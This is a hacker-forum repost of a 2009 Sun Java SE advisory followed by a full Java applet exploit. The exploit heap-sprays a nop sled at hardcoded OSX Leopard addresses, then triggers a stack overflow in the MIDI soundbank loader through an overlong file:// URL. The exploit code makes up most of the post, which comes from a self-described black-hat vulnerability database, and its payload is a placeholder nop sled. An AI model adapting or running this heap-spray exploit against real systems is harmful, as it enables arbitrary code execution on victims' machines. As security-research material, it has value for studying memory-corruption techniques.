跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Sun Java SE November 2009 - Multiple Vulnerabilities (2)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
source: https://www.securityfocus.com/bid/36881/info
 
Sun has released updates to address multiple security vulnerabilities in Java SE.
 
Successful exploits may allow attackers to bypass certain security restrictions, run untrusted applets with elevated privileges, execute arbitrary code, and cause denial-of-service conditions. Other attacks are also possible.
 
These issues are addressed in the following releases:
 
JDK and JRE 6 Update 17
JDK and JRE 5.0 Update 22
SDK and JRE 1.4.2_24
SDK and JRE 1.3.1_27 

*/
import javax.sound.midi.*;
import java.io.*;
import java.net.*;

import java.awt.Graphics;
public class test extends java.applet.Applet
{
        public static Synthesizer synth;
        Soundbank soundbank;

        public void init()
        {
                String fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13-
b05-237)

                // heap sprayed info starts at 0x25580000+12 but keep in mind we
need to be fairly ascii safe.
                // 0x20 is not usable
                byte[] frame = {
                        (byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp
                        (byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip
                        (byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25  // frame 0 - edx
                };
                
                String mal = new String(frame);
                
                //System.out.println(mal);

                fName = "file://" + fName + mal;
                try
                {
                        synth = MidiSystem.getSynthesizer();
                        synth.open();
                        System.out.println("Spray heap\n");
                        
                        String shellcode = "\u41424344" + repeat('\u9090',1000) +
"\u30313233"; // This is just a nop sled with some heading and
trailing markers.
                        int mb = 1024;

                        // Sotirov / Dowd foo follows.
                        // http://taossa.com/archive/bh08sotirovdowd.pdf
                        
                // Limit the shellcode length to 100KB
                        if (shellcode.length() > 100*1024)
                        {
                                throw new RuntimeException();
                        }
                // Limit the heap spray size to 1GB, even though in practice the
Java
                // heap for an applet is limited to 100MB
                if (mb > 1024)
                        {
                        throw new RuntimeException();
                        }
                // Array of strings containing shellcode
                String[] mem = new String[1024];

                // A buffer for the nop slide and shellcode
                StringBuffer buffer = new StringBuffer(1024*1024/2);

                // Each string takes up exactly 1MB of space
                //
                // header    nop slide   shellcode  NULL
                // 12 bytes  1MB-12-2-x  x bytes    2 bytes

                // Build padding up to the first exception. We will need to set
the eax address after this padding
                        // First usable addresses begin at 0x25580000+0x2121. Unfortunately
0x20 in our addresses caused issues.    
                        // 0x2121 is 8481 in decimal, we subtract a few bytes for munging.
                        
                for (int i = 1; i < (8481/2)-4; i++)
                        {
                        buffer.append('\u4848');
                        }
                        
                        // (gdb) x/10a 0x25582122-4
                        //      0x2558211e:     0x48484848      0x20202020      0x20202020      0x20202020
                        //      0x2558212e:     0x20202020      0x20202020      0x20202020      0x20202020
                        //      0x2558213e:     0x20202020      0x20202020
                                        
                        // Set the call address
                        // 0x188fd81b
<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>:        
call   *0x2a8(%eax)

                        buffer.append('\u2122');
                        buffer.append('\u2558');
                                                
                        // 0x2a8 is 680 in decimal, once again we need filler for making
this a usable address location.
                for (int i = 1; i < (680/2)-1; i++)
                        {
                        buffer.append('\u4848');
                        }
                                
                        // where do we wanna go? 0x25582525 is right in the middle of the
following nop sled
                        // (gdb) x/5x 0x25582525
                        //      0x25582525:     0x90909090      0x90909090      0x90909090      0x90909090
                        //      0x25582535:     0x90909090

                        buffer.append('\u2525');
                        buffer.append('\u2558');                                                                                                                                                                        
                                                                                                                                                                                                        
                // We are gonna place the shellcode after this so simply fill
in remaining space with nops!
                for (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++)
                        {
                        buffer.append('\u9090');
                        }

                // Append the shellcode
                        buffer.append(shellcode);

                // Run the garbage collector
                        Runtime.getRuntime().gc();

                // Fill the heap with copies of the string
                try
                        {
                                for (int i=0; i<mb; i++)
                                {
                                        mem[i] = buffer.toString();
                                }
                        }
                catch (OutOfMemoryError err)
                        {
                        // do nothing
                }
                        
                        // Trigger the stack overflow.
                        synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName)));
                }
                catch(Exception e)
                {
                        System.out.println(e);
        }
        }
        public void paint(Graphics g)
        {
                g.drawString("Hello pwned!", 50, 25);
        }
        public static String repeat(char c,int i)
        {
                String tst = "";
                for(int j = 0; j < i; j++)
                {
                        tst = tst+c;
                }
                return tst;
        }
}

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。